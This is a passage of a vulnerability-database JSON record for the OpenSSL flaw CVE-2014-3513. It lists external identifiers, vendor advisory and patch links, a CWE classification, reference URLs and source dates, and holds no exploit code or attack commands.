        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "129932"
      },
      {
        "db": "PACKETSTORM",
        "id": "130541"
      },
      {
        "db": "PACKETSTORM",
        "id": "132082"
      },
      {
        "db": "PACKETSTORM",
        "id": "130144"
      },
      {
        "db": "PACKETSTORM",
        "id": "137201"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128706"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-3513",
        "trust": 2.4
      },
      {
        "db": "SECUNIA",
        "id": "61439",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61058",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61207",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61837",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "62070",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61298",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61990",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61073",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "59627",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61959",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1031052",
        "trust": 1.1
      },
      {
        "db": "BID",
        "id": "70584",
        "trust": 1.1
      },
      {
        "db": "MCAFEE",
        "id": "SB10091",
        "trust": 1.1
      },
      {
        "db": "BID",
        "id": "70585",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-3513",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130815",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129932",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130541",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132082",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "130144",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137201",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132081",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "132080",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128728",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128706",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "db": "BID",
        "id": "70585"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "129932"
      },
      {
        "db": "PACKETSTORM",
        "id": "130541"
      },
      {
        "db": "PACKETSTORM",
        "id": "132082"
      },
      {
        "db": "PACKETSTORM",
        "id": "130144"
      },
      {
        "db": "PACKETSTORM",
        "id": "137201"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128706"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "id": "VAR-201410-0371",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.395238084
  },
  "last_update_date": "2024-07-23T21:06:25.896000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "The Register",
        "trust": 0.2,
        "url": "https://www.theregister.co.uk/2014/10/15/openssl_ddos_vulns/"
      },
      {
        "title": "Ubuntu Security Notice: openssl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2385-1"
      },
      {
        "title": "Red Hat: CVE-2014-3513",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3513"
      },
      {
        "title": "Debian Security Advisories: DSA-3053-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=89bdef3607a7448566a930eca0e94cb3"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-427",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-427"
      },
      {
        "title": "Symantec Security Advisories: SA87 : OpenSSL Security Advisory 15-Oct-2014",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=374cff59719675d8235f907c21b99bfc"
      },
      {
        "title": "Tenable Security Advisories: [R7] OpenSSL \u002720141015\u0027 Advisory Affects Tenable Products",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2014-11"
      },
      {
        "title": "IBM: IBM Security Bulletin: Fabric OS firmware for Brocade 8Gb SAN Switch Module for BladeCenter is affected by vulnerabilities in OpenSSL and OpenSSH",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=b7f5b1e7edcafce07f28205855d4db49"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.4,
        "url": "https://www.openssl.org/news/secadv_20141015.txt"
      },
      {
        "trust": 1.4,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21686997"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-1652.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2014/dsa-3053"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-1692.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2385-1"
      },
      {
        "trust": 1.1,
        "url": "http://advisories.mageia.org/mgasa-2014-0416.html"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/59627"
      },
      {
        "trust": 1.1,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61298"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61959"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61439"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00001.html"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61073"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/70584"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/62070"
      },
      {
        "trust": 1.1,
        "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl6"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1031052"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/kb/en-us/solutions/public/15000/700/sol15722.html"
      },
      {
        "trust": 1.1,
        "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2014-015.txt.asc"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61207"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61058"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61990"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61837"
      },
      {
        "trust": 1.1,
        "url": "http://security.gentoo.org/glsa/glsa-201412-39.xml"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142495837901899\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142624590206005\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142118135300698\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142791032306609\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142834685803386\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=142804214608580\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://lists.apple.com/archives/security-announce/2015/sep/msg00002.html"
      },
      {
        "trust": 1.1,
        "url": "https://support.apple.com/ht205217"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05150888"
      },
      {
        "trust": 1.1,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05158380"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143290583027876\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143290437727362\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "http://marc.info/?l=bugtraq\u0026m=143290522027658\u0026w=2"
      },
      {
        "trust": 1.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10091"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commit%3bh=2b0532f3984324ebe1236a63d15893792384328d"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3567"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3513"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3566"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3568"
      },
      {
        "trust": 0.6,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/"
      },
      {
        "trust": 0.6,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/"
      },
      {
        "trust": 0.6,
        "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3508"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3509"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3511"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5139"
      },
      {
        "trust": 0.3,
        "url": "http://www.openssl.org"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691210"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04574073"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2015/feb/151"
      },
      {
        "trust": 0.3,
        "url": "http://support.citrix.com/article/ctx216642"
      },
      {
        "trust": 0.3,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-14:23.openssl.asc"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04492722"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04616259"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04624296"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05150888"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05158380"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04533567 "
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04533567 "
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21686792"
      },
      {
        "trust": 0.3,
        "url": "https://support.asperasoft.com/entries/103000206-security-advisory-cve-2014-3513-cve-2014-3566-poodle-cve-2014-3567-cve-2014-3568"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097074"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21884030"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959134"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21691005"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21688284"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697995"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697165"
      },
      {
        "trust": 0.3,
        "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21689482"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097375"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098265"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1021548"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097587"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701452"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098105"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21693662"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689347"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097867"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098586"
      },
      {
        "trust": 0.3,
        "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097807"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689743"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020593"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21689332"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21691140"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688762"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/fulldisclosure/2015/jan/108"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/101009000"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699200"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700489"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21687863"
      },
      {
        "trust": 0.3,
        "url": "www-01.ibm.com/support/docview.wss?uid=ssg1s1005003"
      },
      {
        "trust": 0.3,
        "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber"
      },
      {
        "trust": 0.2,
        "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_"
      },
      {
        "trust": 0.2,
        "url": "http://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2385-1/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3513"
      },
      {
        "trust": 0.1,
        "url": "http://www.software.hp.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7186"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7169"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6271"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6277"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7187"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-6278"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-0c9e74c0cd5a48b4a537e63427"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-a7973a3813bf47d8afdb053b58"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-b41f3bc307ee43d39a172d249f"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/swpublishing/mtx-0d22e1c193434997889fa62736"
      },
      {
        "trust": 0.1,
        "url": "https://h20566.www2.hp.com/hpsc/swd/public/detail?switemid=mtx_00eb9ac82e864"
      },
      {
        "trust": 0.1,
        "url": "https://h20566.www2.hp.com/hpsc/swd/public/detail?switemid=mtx_34bcab41ac7e4"
      },
      {
        "trust": 0.1,
        "url": "http://www.hp.com/go/insightupdates"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/vmwaresrc"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1044"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1044"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3566"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2078735"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2070666"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3513"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-1043"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8370"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2075521"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2065832"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/go/downloadplayer"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3568"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3660"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3567"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1043"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/support/policies/lifecycle.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/go/downloadworkstation"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3660"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/2099265"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8370"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/go/download-vsphere"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1790"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/info/insightmanagement"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2019"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1788"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1792"
      },
      {
        "trust": 0.1,
        "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05131085"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_n"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2020"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2018"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1789"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2022"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1791"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7501"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2027"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2026"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2021"
      },
      {
        "trust": 0.1,
        "url": "http://h18013.www1.hp.com/products/servers/management/hpsim/download.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3513.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3567.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/1232123"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "db": "BID",
        "id": "70585"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "129932"
      },
      {
        "db": "PACKETSTORM",
        "id": "130541"
      },
      {
        "db": "PACKETSTORM",
        "id": "132082"
      },
      {
        "db": "PACKETSTORM",
        "id": "130144"
      },
      {
        "db": "PACKETSTORM",
        "id": "137201"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128706"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "db": "BID",
        "id": "70585"
      },
      {
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "db": "PACKETSTORM",
        "id": "129932"
      },
      {
        "db": "PACKETSTORM",
        "id": "130541"
      },
      {
        "db": "PACKETSTORM",
        "id": "132082"
      },
      {
        "db": "PACKETSTORM",
        "id": "130144"
      },
      {
        "db": "PACKETSTORM",
        "id": "137201"
      },
      {
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "db": "PACKETSTORM",
        "id": "128706"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-10-19T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "date": "2014-10-15T00:00:00",
        "db": "BID",
        "id": "70585"
      },
      {
        "date": "2015-03-13T17:11:00",
        "db": "PACKETSTORM",
        "id": "130815"
      },
      {
        "date": "2015-01-14T03:51:42",
        "db": "PACKETSTORM",
        "id": "129932"
      },
      {
        "date": "2015-02-26T17:12:16",
        "db": "PACKETSTORM",
        "id": "130541"
      },
      {
        "date": "2015-05-29T23:37:23",
        "db": "PACKETSTORM",
        "id": "132082"
      },
      {
        "date": "2015-01-28T18:22:00",
        "db": "PACKETSTORM",
        "id": "130144"
      },
      {
        "date": "2016-05-26T09:22:00",
        "db": "PACKETSTORM",
        "id": "137201"
      },
      {
        "date": "2015-05-29T23:37:11",
        "db": "PACKETSTORM",
        "id": "132081"
      },
      {
        "date": "2015-05-29T23:37:04",
        "db": "PACKETSTORM",
        "id": "132080"
      },
      {
        "date": "2014-10-17T14:50:20",
        "db": "PACKETSTORM",
        "id": "128728"
      },
      {
        "date": "2014-10-17T00:03:21",
        "db": "PACKETSTORM",
        "id": "128706"
      },
      {
        "date": "2014-10-19T01:55:13.887000",
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-3513"
      },
      {
        "date": "2016-09-09T15:00:00",
        "db": "BID",
        "id": "70585"
      },
      {
        "date": "2023-11-07T02:20:11.097000",
        "db": "NVD",
        "id": "CVE-2014-3513"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "70585"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
